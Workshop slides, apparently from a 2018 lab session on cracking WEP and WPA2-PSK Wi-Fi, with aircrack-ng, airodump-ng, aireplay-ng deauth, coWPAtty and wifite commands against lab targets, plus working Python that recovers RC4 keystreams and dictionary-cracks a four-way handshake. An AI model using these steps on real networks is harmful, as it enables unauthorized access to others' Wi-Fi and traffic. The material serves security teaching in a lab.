Hacking Wi-Fi Beyond Script Kiddie and WEP
Jakob Nelson, March 8, 2018
First Things FIRST! - Ethics
Wi-Fi hacking has a very low probability of being detected. People have networks all around us, and they can be tempting. IF IT'S NOT YOURS, DON'T PLAY WITH IT! It isn't hard or expensive to build up some lab systems to try out these techniques; I will be providing documentation on how I created mine.
What We Will Cover
- Some theory of wireless communications
- Some theory of cryptography
- The basic standards: 802.11a, b, g, n, ac
- Pre-shared key networks
- What features a wireless card should have
- If we have time: getting 802.11ac to work in Linux
What We Will NOT Cover
- 802.1X and enterprise Wi-Fi implementations
- Isolated client attacks
- In-depth WEP cracking
- Post-penetration exploitation
Documentation: www.jakobnelson.com/
Theory of Wireless
Station: a client that can connect to an access point.
Access Point: a central device that can accommodate multiple stations connecting at the same time.
What is the difference between a router and an access point? An access point only bridges wireless stations onto a network; a router forwards traffic between networks. Most consumer "wireless routers" bundle both, which is why the terms get mixed up.
Theory of Wireless
Medium access: 802.11 stations share a channel with Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA), not fixed time slots. Every frame on a channel is broadcast over the air, which is why a card in monitor mode sees all of them.
Non-overlapping 2.4 GHz channels at 20 MHz bandwidth (b, g, n): 1, 6, 11
Non-overlapping 2.4 GHz channels at 40 MHz bandwidth (n): effectively one, since a single 40 MHz channel already covers half the usable band
Number of overlapping 2.4 GHz channels (in the US): 1-11
Number of 5 GHz channels: LOTS of them, which is why the 5 GHz targets need a card that can monitor that band
Cryptography Theory
What is a stream cipher? An algorithm that expands a key into a stream of pseudorandom bits (the keystream).
How is the ciphertext created? XOR the keystream with the plaintext. Decryption is the same XOR, so anyone who learns the keystream for a given key and IV can decrypt every frame encrypted under it, and anyone who knows the plaintext of one frame learns the keystream.
Algorithm used by WEP: RC4
Cryptography Theory
The per-packet RC4 key is the 24-bit IV, sent in the clear in the frame header, prepended to the 40- or 104-bit pre-shared key.
What is broken: Short IV length: 3 bytes = 2**24 = ~16.8M IVs, so a busy network exhausts the IV space in hours and repeats start long before that, and RC4's weak per-packet keys leak key bytes statistically (the FMS, KoreK and PTW attacks that aircrack-ng implements). Many different attacks lead to key recovery.
WEP IS BROKEN... DO NOT USE IT!
What are we going to target?
WEP packets... lots of data packets. Really we want the unique IVs (aircrack-ng's default PTW attack needs tens of thousands of them), but save the whole packets: once the key is recovered, they can be decrypted later.
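To make the stream-cipher and IV points concrete, here is an added example that is not code from the slides or from aircrack-ng: a toy WEP encryptor built on a from-scratch RC4, followed by the attacker-side steps that fall out of it. The 40-bit shared key, the IV and the two frames are constructed for the demonstration; the one real constant is the LLC/SNAP header that begins every 802.11 IP frame, which is what hands an attacker known plaintext.

```python
import zlib

# Added example, not from the slides or aircrack-ng. RC4, the IV||key per-packet
# key and the CRC-32 ICV follow the real WEP layout; the shared key, IV and
# frames below are constructed for the demonstration.

def rc4(key: bytes, data: bytes) -> bytes:
    """RC4: key scheduling (KSA) then keystream generation (PRGA) XORed with data.
    Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):                                   # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                      # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian, appended before encryption."""
    return zlib.crc32(plaintext).to_bytes(4, "little")

def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (in the clear) || RC4(IV || shared_key, plaintext || ICV).
    With a 3-byte IV there are only 2**24 = 16,777,216 keystreams per shared key."""
    assert len(iv) == 3 and len(shared_key) in (5, 13)     # WEP-40 or WEP-104
    return iv + rc4(iv + shared_key, plaintext + icv(plaintext))

def wep_decrypt(shared_key: bytes, frame: bytes) -> bytes:
    """Legitimate receiver: rebuild the per-packet key from the clear IV, strip and check the ICV."""
    iv, body = frame[:3], frame[3:]
    data = rc4(iv + shared_key, body)
    plaintext = data[:-4]
    if data[-4:] != icv(plaintext):
        raise ValueError("ICV mismatch")
    return plaintext

def keystream_from_known_plaintext(frame: bytes, known_plaintext: bytes) -> bytes:
    """Attacker, no key needed: ciphertext XOR known plaintext = the keystream for this IV.
    Knowing the plaintext also gives its ICV, so the keystream covers the whole body."""
    return bytes(c ^ p for c, p in zip(frame[3:], known_plaintext + icv(known_plaintext)))

def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt any other frame that reused the same IV, as far as the keystream reaches."""
    body = frame[3:]
    recovered = bytes(c ^ k for c, k in zip(body, keystream))
    return recovered[:-4] if len(recovered) == len(body) else recovered   # drop ICV only on full coverage

def xor_of_plaintexts(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under one IV: C1 XOR C2 = P1 XOR P2, the keystream cancels out."""
    return bytes(a ^ b for a, b in zip(frame_a[3:], frame_b[3:]))

# --- constructed traffic ---
SHARED_KEY = b"\x01\x02\x03\x04\x05"                # constructed 40-bit key
IV = b"\x00\x01\x02"                                  # constructed; reused by both frames below
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")      # real constant: LLC/SNAP + EtherType IPv4
FRAME_A = wep_encrypt(SHARED_KEY, IV, LLC_SNAP_IP + b"GET / HTTP/1.0\r\n")
FRAME_B = wep_encrypt(SHARED_KEY, IV, LLC_SNAP_IP + b"secret=hunter2")

def recover_frame_b() -> bytes:
    """Attacker: learn the keystream from frame A's guessable plaintext, apply it to frame B."""
    keystream = keystream_from_known_plaintext(FRAME_A, LLC_SNAP_IP + b"GET / HTTP/1.0\r\n")
    return decrypt_with_keystream(FRAME_B, keystream)

if __name__ == "__main__":
    print(recover_frame_b())
```

The point of `xor_of_plaintexts` is that even without any known plaintext, two frames sharing an IV expose the XOR of their contents; the first eight bytes come out as zeros because both frames carry the same LLC/SNAP header. Statistical key recovery (FMS/KoreK/PTW) builds on the same structure but needs the IV counts the later slides talk about.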
Let’s get hands on!
Activate Monitor Mode! airmon-ng
1. List your wireless devices: # airmon-ng
2. Select a device.
3. Put the device into monitor mode: # airmon-ng start wlan0 (the monitor interface is typically named wlan0mon)
4. Kill off the processes (NetworkManager, wpa_supplicant and friends) that will interfere with your adapter: # airmon-ng check kill
5. Run # airmon-ng check again to verify that the interfering processes are gone.
Start the Scan! airodump-ng
Run the following: # airodump-ng <your monitor interface>
By default this hops across the 2.4 GHz channels. Did you get packets?
If you have a 5 GHz capable card, try this: # airodump-ng --band a <your monitor interface>
Networks you should see:
2.4 GHz (B, G, N):
Target1 - c4:6e:1f:16:72:0c
Target3 - 30:91:8f:f3:22:35
Target4 - 04:95:e6:59:4c:f1
5 GHz (N):
Target2 - 30:91:8f:f3:22:3b
Target4 - 04:95:e6:59:4c:f5
Target5 - c8:3a:35:5e:8a:81
Saving your sniffed traffic:
Please target specific networks or SSIDs. Remember that they are on a variety of channels: lock airodump-ng to the target's channel with -c <channel> rather than hopping, or you will miss most of its frames (including the handshake).
Save packets using -w <file prefix>
Filter for the correct BSSID with -d <bssid> (the same as --bssid)
Target1 Strategy: Collect a bunch of WEP packets (about 60k IVs) and use aircrack-ng.
1. Start sniffing on the appropriate channel and BSSID!
2. Open up another window and navigate to the directory where you are writing the captured packets.
3. Run aircrack-ng against it; it keeps retrying as more IVs arrive in the file: # aircrack-ng <file name>
What if all my stuff is broken?
Look at the packet capture files for this target.
Try these different files and options:
File: Target1-Original.cap. Pay attention to the number of IVs.
File: Target iv.cap. Options: none (the default fudge factor is -f 2), -f 13, -f 14. A higher fudge factor makes aircrack-ng try more candidate key bytes at each position, which can succeed with fewer IVs at the cost of a longer run.
Cryptography Theory
What is a block cipher? An algorithm that encrypts a fixed-size block of data at a time under a key (AES, used by WPA2, works on 16-byte blocks).
What is a nonce? A number used once, so that every handshake derives fresh session keys even though the PMK never changes.
AP Nonce (ANonce): 256 bits
Station Nonce (SNonce): 256 bits
* Technically these are the authenticator and supplicant nonce values.
Cryptography Theory
What is a MIC? Message Integrity Check: a keyed checksum over the handshake frame, so each side can tell that the other derived the same key without the key ever being sent.
Keys:
PMK - Pairwise Master Key. For WPA-PSK this is the pre-shared key, derived from the passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations), so it is the same for every station on the network.
PTK - Pairwise Transient Key (computed from the PMK, the two nonces and the two MAC addresses; it contains the KCK that keys the MIC and the temporal key used for data encryption)
GTK - Group Temporal Key (for multicast and broadcast data, delivered to the station encrypted under the PTK)
Four-way Handshake (WPA2)
Message 1: AP to station, ANonce.
Message 2: station to AP, SNonce plus a MIC computed with the freshly derived PTK.
Message 3: AP to station, the GTK and the install instruction, with a MIC.
Message 4: station to AP, acknowledgement, with a MIC.
Cryptography Theory
AES-CCMP: AES in CTR mode for confidentiality with a CBC-MAC for integrity (CCM = Counter with CBC-MAC), keyed with the temporal key taken from the PTK.
What are we going to target?
The 4-way handshake. Messages 1 and 2 are enough: they carry the ANonce, the SNonce, both MAC addresses and a MIC to test guesses against, and the SSID comes from the beacons.
Breaking WPA
Breaking WPA relies on guessing the password: for each guess, derive the PMK from the guess and the SSID, derive the PTK from the captured nonces and MACs, and check whether it reproduces the captured MIC.
I selected the password from early in the rockyou.txt list. (Time 39s to crack in VM with 2 cores and 4 GB RAM). Pay attention to the k/s (keys / second) rate near the top of the screen and write it down.
Target2 and Target3 Strategy:
1. Start sniffing on the appropriate channel and BSSID!
2. Get a handshake (the lab client should be disassociating itself every 60 seconds, so one will show up without any deauth on your part).
3. Run aircrack-ng against it: # aircrack-ng -w <dictionary> <file name>
What if all my stuff is broken?
A handshake is provided in the following files: Target2-handshake.cap and Target3-handshake.cap
Target4 Strategy: Collect a handshake, but this time, use coWPAtty to crack it.
1. Start sniffing on the appropriate channel and BSSID!
2. Open up another window and navigate to the directory where you are writing the captured packets.
3. Run coWPAtty against it with a precomputed PMK file: # cowpatty -d <pmk file> -s <essid> -r <capture file>
What if all my stuff is broken?
A handshake is provided in the following files: Target4-handshake.cap
What was the advantage of this?
Precompute PMKs for a given SSID (ESSID). The PBKDF2 step that turns a passphrase into a PMK depends only on the passphrase and the SSID, so it can be done before any handshake is captured; once a handshake is found, testing each precomputed PMK only needs the cheap PTK derivation and MIC comparison.
~1800 keys/second with aircrack-ng
250,000 keys/second with coWPAtty (precomputed PMKs)
Advantages in pentesting? The expensive work can be done ahead of time for the client's SSIDs. The flip side is that a table is bound to one SSID, which is also why a unique SSID defeats generic precomputed tables.
How do I make my own PMK file?
Use the genpmk tool that ships with coWPAtty: # genpmk -f <wordlist> -d <output file> -s <essid>
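The key hierarchy, what one password guess actually costs, and why a genpmk/coWPAtty table is so much faster, as an added example that is not code from the slides, aircrack-ng or coWPAtty. PBKDF2, PRF-512 and the EAPOL-Key MIC follow 802.11i; the SSID, client MAC, nonces, passphrase and the minimal EAPOL-Key message 2 are constructed (the AP MAC is the slides' Target2 BSSID). A real capture also carries the RSN IE in the key-data field, which the MIC covers, so the frame bytes are the one thing a reader would take from a pcap rather than from here.

```python
import hashlib
import hmac
import struct

# Added example, not from the slides, aircrack-ng or coWPAtty. PBKDF2, PRF-512
# and the EAPOL-Key MIC follow 802.11i; SSID, client MAC, nonces, passphrase and
# the EAPOL frame are constructed.

EAPOL_MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields precede the Key MIC

def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The expensive step; it depends only on passphrase and SSID, so it can be precomputed."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    For CCMP: KCK = PTK[0:16] (MIC key), KEK = PTK[16:32], TK = PTK[32:48] (data key)."""
    label = b"Pairwise key expansion"
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]                           # 4 * 20 bytes >= 64
    return b"".join(blocks)[:64]

def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/RSN (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16].
    WPA/TKIP (version 1) uses HMAC-MD5 here instead."""
    zeroed = eapol_frame[:EAPOL_MIC_OFFSET] + b"\x00" * 16 + eapol_frame[EAPOL_MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (station -> AP); the MIC covers this whole frame."""
    body = (bytes([2])                        # descriptor type 2 = RSN (WPA2)
            + struct.pack(">H", 0x010A)       # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC present
            + struct.pack(">H", 16)           # key length (CCMP)
            + struct.pack(">Q", 1)            # replay counter
            + snonce                          # key nonce
            + b"\x00" * 16                    # key IV
            + b"\x00" * 8                     # key RSC
            + b"\x00" * 8                     # key ID (reserved)
            + mic                             # key MIC, lands at offset 81
            + struct.pack(">H", 0))           # key data length (RSN IE omitted in this toy frame)
    return bytes([1, 3]) + struct.pack(">H", len(body)) + body   # 802.1X version 1, type 3 = EAPOL-Key

# --- constructed lab capture: what airodump-ng -w would have saved from Target2 ---
ESSID = "Target2"
AP_MAC = bytes.fromhex("30918ff3223b")          # the slides' Target2 BSSID
STA_MAC = bytes.fromhex("001122334455")         # constructed client MAC
ANONCE = bytes(range(32))                       # constructed; real nonces are 256 random bits
SNONCE = bytes(range(32, 64))
_TRUE_PASSPHRASE = "password1"                  # constructed; unknown to the attacker functions below

def _make_capture() -> dict:
    kck = ptk_from_pmk(pmk_from_passphrase(_TRUE_PASSPHRASE, ESSID),
                       AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, build_eapol_msg2(SNONCE))
    return {"essid": ESSID, "aa": AP_MAC, "spa": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": build_eapol_msg2(SNONCE, mic)}

CAPTURE = _make_capture()

def mic_matches(capture: dict, pmk: bytes) -> bool:
    """The cheap part of a guess: PRF-512 plus one HMAC, compared to the captured MIC."""
    kck = ptk_from_pmk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])[:16]
    captured = capture["eapol"][EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, capture["eapol"]), captured)

def crack(capture: dict, wordlist):
    """aircrack-ng -w style: PBKDF2 for every candidate, then the MIC check. Returns the passphrase or None."""
    for candidate in wordlist:
        if mic_matches(capture, pmk_from_passphrase(candidate, capture["essid"])):
            return candidate
    return None

def precompute_pmks(essid: str, wordlist) -> dict:
    """genpmk style: pay PBKDF2 once per (SSID, passphrase) before any handshake exists."""
    return {candidate: pmk_from_passphrase(candidate, essid) for candidate in wordlist}

def crack_with_table(capture: dict, pmk_table: dict):
    """cowpatty -d style: only PRF-512 + HMAC per guess, hence far more keys/second."""
    for candidate, pmk in pmk_table.items():
        if mic_matches(capture, pmk):
            return candidate
    return None

if __name__ == "__main__":
    words = ["123456", "iloveyou", "password1", "princess"]
    print(crack(CAPTURE, words), crack_with_table(CAPTURE, precompute_pmks(ESSID, words)))
```

`crack()` pays two PBKDF2 rounds of 4096 HMAC-SHA1 iterations per guess, which is where aircrack-ng's ~1800 k/s goes; `crack_with_table()` only does PRF-512 plus one HMAC per guess, which is the cowpatty -d path. A table built for a different SSID never matches, which is the binding that genpmk -s encodes.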
Are there better tools for this?
Yes, a better tool exists: Pyrit. It keeps a database of passwords and ESSIDs, precomputes the PMK for every (ESSID, password) pair, and can use the GPU. Lots faster, but it doesn't really work for this training session.
Target5 Strategy:
1. Deauth a client using aireplay-ng (its --deauth option, with -a for the BSSID and -c for the client) so that the client reconnects and you capture a fresh handshake.
2. Crack with aircrack-ng.
Start sniffing on the appropriate channel and BSSID before you send the deauth, so the handshake lands in the capture file! Open up another window and navigate to the directory where you are writing the captured packets. Run aircrack-ng against it: # aircrack-ng -w <dictionary> <file name>
What if all my stuff is broken?
Look at Target5-handshake.cap (Sorry, this is going to be exactly the same exercise done on Target2 and Target3)
Target ALL THE THINGS!!!! Strategy: Use wifite...
Let it scan, then press Ctrl+C to choose targets. DON'T use "all"! You can attack any of the Target access points previously used. Have fun!
What if all my stuff is broken?
Check out my website in a few days for updates and suggestions on making things work.
I'm Out!